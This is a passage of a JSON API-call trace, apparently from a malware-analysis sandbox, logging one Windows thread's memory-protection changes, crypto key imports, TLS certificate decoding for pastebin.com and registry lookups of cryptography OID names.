"pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1492 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffecb1a2af2", "parentcaller": "0x7ffee057220a", "category": "crypto", "api": "BCryptImportKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyBlob", "value": "0\\x02\\x00\\x00KSSM\\x02\\x00\\x01\\x00\\x05\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x80\\x00\\x00\\x00\\x10\\x00\\x00\\x00T\\x05\\x81+8\\xf8\\x94>\\x1c\\xb7\\xd1\\xbbz\\xb8\\x00\\x19\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00T\\x05\\x81+8\\xf8\\x94>\\x1c\\xb7\\xd1\\xbbz\\xb8\\x00\\x199fU\\xf1\\x01\\x9e\\xc1\\xcf\\x1d)\\x10tg\\x91\\x10m\\xba\\xacit\\xbb2\\xa8\\xbb\\xa6\\x1b\\xb8\\xcf\\xc1\\x8a\\xa8\\xa2\\xc0nS\\x0c{\\\\xfb\\xb7\\xddGCx\\x1c\\xcd\\xeb\\xdau\\x87\\x04\\x90\\x0e\\xdb\\xff'\\xd3\\x9c\\xbc_\\xcfQW\\x85\\xb4\\xdc\\x93\\x1a\\xba\\x07l=i\\x9b\\xd0b\\xa6\\xca\\x87\\xe7\\xe0\\xcb\\x07>Z\\xcck\\x033W\\xbba\\x95\\x9d<\\x86\\xfe C\\x14\\xa4\\xec(\\x17\\x97\\xbb\\x93v\\x02&\\xaf\\xf0\\x89Y\\xcfc-\\xb5\\xe7t\\xba\\x0et\\x02\\xb8(\\xdb\\xf2\\xa6\\xe0F\\x0f\\x8bU\\xa1{1[\\xd5y\\x89s\\x0e\\x8b\\x1fK{\\xa8\\x94\\x1e\\xda\\xd3\\xa5E\\x0f\\xaa,6\\x01!\\xf0Q\\x0e\\xa0\\xa0:\\x82\\x1c\\xf4x\\x87\\xcd\\xe6\\xee\\x9f\\xe8" }, { "name": "Flags", "value": "0x00000000" }, { "name": "CryptKey", "value": "0x05d5f990" }, { "name": "Length", "value": "560" } ], "repeated": 0, "id": 1493 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee34b7830", "parentcaller": "0x7ffee34a20f9", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffedfb33000" }, { "name": "ModuleName", "value": "schannel.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1494 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee34b7881", "parentcaller": "0x7ffee34a20f9", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffedfb33000" }, { "name": "ModuleName", "value": "schannel.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1495 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bb1210", "parentcaller": "0x7ffee0bac99e", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\MSASN1" }, { "name": "DllBase", "value": "0x7ffee0690000" } ], "repeated": 0, "id": 1496 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bb1210", "parentcaller": "0x7ffee0bac99e", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00000001" }, { "name": "Encoded", "value": "0\\x82\\x03\\xa60\\x82\\x03L\\xa0\\x03\\x02\\x01\\x02\\x02\\x11\\x00\\xfc_eMG\\x92\\xa06\\x0eoE4\\xb9\\xf3\\x11\\xe70\n\\x06\\x08*\\x86H\\xce=\\x04\\x03\\x020;1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Google Trust Services1\\x0c0\n\\x06\\x03U\\x04\\x03\\x13\\x03WE10\\x1e\\x17\r251119161223Z\\x17\r260217171220Z0\\x171\\x150\\x13\\x06\\x03U\\x04\\x03\\x13\\x0cpastebin.com0Y0\\x13\\x06\\x07*\\x86H\\xce=\\x02\\x01\\x06\\x08*\\x86H\\xce=\\x03\\x01\\x07\\x03B\\x00\\x04\t\\xd6\\xc7\\xed\\x85GCf\\x9b|p\\xd2\\x95\\xe4\\xfb\\x87\\xa8\\xb8\\xca\\x86E\\x1d5Qu7\\xdeA%\\xae\\x1cS\\x03\\x8b\\xa6\\xf7wT\\xfb\\xf9\\xa7Oh\\xe6,\\x8c l\\xcf\\x16\\xa2\\x1e)b\\xa8v%\\x88e\\xdbl\\x8c\\x80\\xe2\\xa3\\x82\\x02" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1497 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bb1210", "parentcaller": "0x7ffee0bac99e", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00000001" }, { "name": "Encoded", "value": "0\\x82\\x02\\x9f0\\x82\\x02%\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x7f\\xf3\\x19w\\x97,\"Jv\\x15]\\x13\\xb6\\xd6\\x85\\xe30\n\\x06\\x08*\\x86H\\xce=\\x04\\x03\\x030G1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\"0 \\x06\\x03U\\x04\n\\x13\\x19Google Trust Services LLC1\\x140\\x12\\x06\\x03U\\x04\\x03\\x13\\x0bGTS Root R40\\x1e\\x17\r231213090000Z\\x17\r290220140000Z0;1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Google Trust Services1\\x0c0\n\\x06\\x03U\\x04\\x03\\x13\\x03WE10Y0\\x13\\x06\\x07*\\x86H\\xce=\\x02\\x01\\x06\\x08*\\x86H\\xce=\\x03\\x01\\x07\\x03B\\x00\\x04o\\xcd:\\xfegWGL!\\x03\\x85@\\xc2G]\\xbbXG\\x0f@" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1498 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bb1210", "parentcaller": "0x7ffee0bac99e", "category": "crypto", "api": "CryptDecodeObjectEx", "status": true, "return": "0x00000001", "arguments": [ { "name": "CertEncodingType", "value": "0x00000001" }, { "name": "Encoded", "value": "0\\x82\\x03z0\\x82\\x02b\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x7f\\xe50\\xbf3\\x13C\\xbe\\xdd\\x82\\x16\\x10I=\\x8a\\x1b0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000W1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02BE1\\x190\\x17\\x06\\x03U\\x04\n\\x13\\x10GlobalSign nv-sa1\\x100\\x0e\\x06\\x03U\\x04\\x0b\\x13\\x07Root CA1\\x1b0\\x19\\x06\\x03U\\x04\\x03\\x13\\x12GlobalSign Root CA0\\x1e\\x17\r231115034321Z\\x17\r280128000042Z0G1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\"0 \\x06\\x03U\\x04\n\\x13\\x19Google Trust Services LLC1\\x140\\x12\\x06\\x03U\\x04\\x03\\x13\\x0bGTS Root R40v0\\x10\\x06\\x07*\\x86H\\xce=\\x02\\x01\\x06\\x05+" }, { "name": "Flags", "value": "0x00008005" } ], "repeated": 0, "id": 1499 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbe549", "parentcaller": "0x7ffee0bb263f", "category": "registry", "api": "RegOpenKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Cryptography\\OID" }, { "name": "Handle", "value": "0x00000538" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID" } ], "repeated": 0, "id": 1500 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbe5f4", "parentcaller": "0x7ffee0bb263f", "category": "registry", "api": "RegOpenKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000538" }, { "name": "SubKey", "value": "EncodingType 0" }, { "name": "Handle", "value": "0x0000053c" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0" } ], "repeated": 0, "id": 1501 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbec4c", "parentcaller": "0x7ffee0bbe6a7", "category": "registry", "api": "RegOpenKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x0000053c" }, { "name": "SubKey", "value": "CryptDllFindOIDInfo" }, { "name": "Handle", "value": "0x00000540" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo" } ], "repeated": 0, "id": 1502 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbe781", "parentcaller": "0x7ffee0bb263f", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000540" }, { "name": "Index", "value": "0" }, { "name": "Name", "value": "1.3.6.1.4.1.311.10.3.37!7" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7" } ], "repeated": 0, "id": 1503 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbe7b1", "parentcaller": "0x7ffee0bb263f", "category": "registry", "api": "RegOpenKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000540" }, { "name": "SubKey", "value": "1.3.6.1.4.1.311.10.3.37!7" }, { "name": "Handle", "value": "0x00000544" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7" } ], "repeated": 0, "id": 1504 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbe9c3", "parentcaller": "0x7ffee0bbe7fb", "category": "registry", "api": "RegQueryInfoKeyW", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000544" }, { "name": "Class", "value": "" }, { "name": "SubKeyCount", "value": "0" }, { "name": "MaxSubKeyLength", "value": "0" }, { "name": "MaxClassLength", "value": "0" }, { "name": "ValueCount", "value": "1" }, { "name": "MaxValueNameLength", "value": "4" }, { "name": "MaxValueLength", "value": "70" } ], "repeated": 0, "id": 1505 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbeac9", "parentcaller": "0x7ffee0bbe7fb", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000544" }, { "name": "Index", "value": "0" }, { "name": "ValueName", "value": "Name" }, { "name": "Data", "value": "@%SystemRoot%\\System32\\ci.dll,-100" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7\\Name" } ], "repeated": 0, "id": 1506 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbf1d0", "parentcaller": "0x7ffee0bb34e9", "category": "registry", "api": "RegOpenKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7" }, { "name": "Handle", "value": "0x00000548" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7" } ], "repeated": 0, "id": 1507 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10c2e92", "parentcaller": "0x7ffee10ffb6e", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000548" }, { "name": "ValueName", "value": "Name" }, { "name": "Data", "value": "@%SystemRoot%\\System32\\ci.dll,-100" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7\\Name" } ], "repeated": 0, "id": 1508 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10baeb5", "parentcaller": "0x7ffee10ba4cb", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings" } ], "repeated": 0, "id": 1509 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10baf05", "parentcaller": "0x7ffee10ba4cb", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "ValueName", "value": "StringCacheGeneration" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration" } ], "repeated": 0, "id": 1510 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10baf2f", "parentcaller": "0x7ffee10ba4cb", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000054c" } ], "repeated": 0, "id": 1511 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee34a6c8b", "parentcaller": "0x7ffee34867b5", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x00\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00j\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x02\\x00\\x00\\x00\\x00\\xf9\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1512 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee34867ec", "parentcaller": "0x7ffee10bfa4e", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "DesiredAccess", "value": "0x02000000", "pretty_value": "MAXIMUM_ALLOWED" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER" } ], "repeated": 0, "id": 1513 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10bf9e9", "parentcaller": "0x7ffee10cad45", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "DesiredAccess", "value": "0x0002001f", "pretty_value": "KEY_READ|KEY_WRITE" }, { "name": "ObjectAttributesHandle", "value": "0x0000054c" }, { "name": "ObjectAttributesName", "value": "Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78" } ], "repeated": 0, "id": 1514 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10bfa05", "parentcaller": "0x7ffee10cad45", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000054c" } ], "repeated": 0, "id": 1515 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10c07f5", "parentcaller": "0x7ffee10ba864", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\ci.dll" } ], "repeated": 0, "id": 1516 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10be270", "parentcaller": "0x7ffee10bb8b0", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "ValueName", "value": "@%SystemRoot%\\System32\\ci.dll,-100" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "Isolated User Mode (IUM)" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\ci.dll,-100" } ], "repeated": 0, "id": 1517 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10ba8d5", "parentcaller": "0x7ffee10ffc2b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000550" } ], "repeated": 0, "id": 1518 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10c2e92", "parentcaller": "0x7ffee10ffb6e", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000548" }, { "name": "ValueName", "value": "Name" }, { "name": "Data", "value": "@%SystemRoot%\\System32\\ci.dll,-100" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7\\Name" } ], "repeated": 0, "id": 1519 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10baeb5", "parentcaller": "0x7ffee10ba4cb", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings" } ], "repeated": 0, "id": 1520 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10baf05", "parentcaller": "0x7ffee10ba4cb", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "ValueName", "value": "StringCacheGeneration" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration" } ], "repeated": 0, "id": 1521 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10baf2f", "parentcaller": "0x7ffee10ba4cb", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000550" } ], "repeated": 0, "id": 1522 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee34a6c8b", "parentcaller": "0x7ffee34867b5", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x00\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00j\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x02\\x00\\x00\\x00\\x00\\xf9\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1523 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee34867ec", "parentcaller": "0x7ffee10bfa4e", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "DesiredAccess", "value": "0x02000000", "pretty_value": "MAXIMUM_ALLOWED" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER" } ], "repeated": 0, "id": 1524 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10bf9e9", "parentcaller": "0x7ffee10cad45", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "DesiredAccess", "value": "0x0002001f", "pretty_value": "KEY_READ|KEY_WRITE" }, { "name": "ObjectAttributesHandle", "value": "0x00000550" }, { "name": "ObjectAttributesName", "value": "Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78" } ], "repeated": 0, "id": 1525 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10bfa05", "parentcaller": "0x7ffee10cad45", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000550" } ], "repeated": 0, "id": 1526 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10c07f5", "parentcaller": "0x7ffee10ba864", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\ci.dll" } ], "repeated": 0, "id": 1527 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10be270", "parentcaller": "0x7ffee10bb8b0", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "ValueName", "value": "@%SystemRoot%\\System32\\ci.dll,-100" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "Isolated User Mode (IUM)" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\ci.dll,-100" } ], "repeated": 0, "id": 1528 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee10ba8d5", "parentcaller": "0x7ffee10ffc2b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000054c" } ], "repeated": 0, "id": 1529 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbf464", "parentcaller": "0x7ffee0bbf2b2", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000548" } ], "repeated": 0, "id": 1530 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbe88e", "parentcaller": "0x7ffee0bb263f", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000544" } ], "repeated": 0, "id": 1531 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbe781", "parentcaller": "0x7ffee0bb263f", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000540" }, { "name": "Index", "value": "1" }, { "name": "Name", "value": "1.3.6.1.4.1.311.10.3.42!7" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7" } ], "repeated": 0, "id": 1532 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbe7b1", "parentcaller": "0x7ffee0bb263f", "category": "registry", "api": "RegOpenKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000540" }, { "name": "SubKey", "value": "1.3.6.1.4.1.311.10.3.42!7" }, { "name": "Handle", "value": "0x00000544" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7" } ], "repeated": 0, "id": 1533 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbe9c3", "parentcaller": "0x7ffee0bbe7fb", "category": "registry", "api": "RegQueryInfoKeyW", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000544" }, { "name": "Class", "value": "" }, { "name": "SubKeyCount", "value": "0" }, { "name": "MaxSubKeyLength", "value": "0" }, { "name": "MaxClassLength", "value": "0" }, { "name": "ValueCount", "value": "1" }, { "name": "MaxValueNameLength", "value": "4" }, { "name": "MaxValueLength", "value": "70" } ], "repeated": 0, "id": 1534 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbeac9", "parentcaller": "0x7ffee0bbe7fb", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000544" }, { "name": "Index", "value": "0" }, { "name": "ValueName", "value": "Name" }, { "name": "Data", "value": "@%SystemRoot%\\System32\\ci.dll,-101" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7\\Name" } ], "repeated": 0, "id": 1535 }, { "timestamp": "2025-11-20 10:58:35,359", "thread_id": "1596", "caller": "0x7ffee0bbf1d0", "parentcaller": "0x7ffee0bb34e9", "category": "registry", "api": "RegOpenKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Cryptography\\OID\\EncodingType 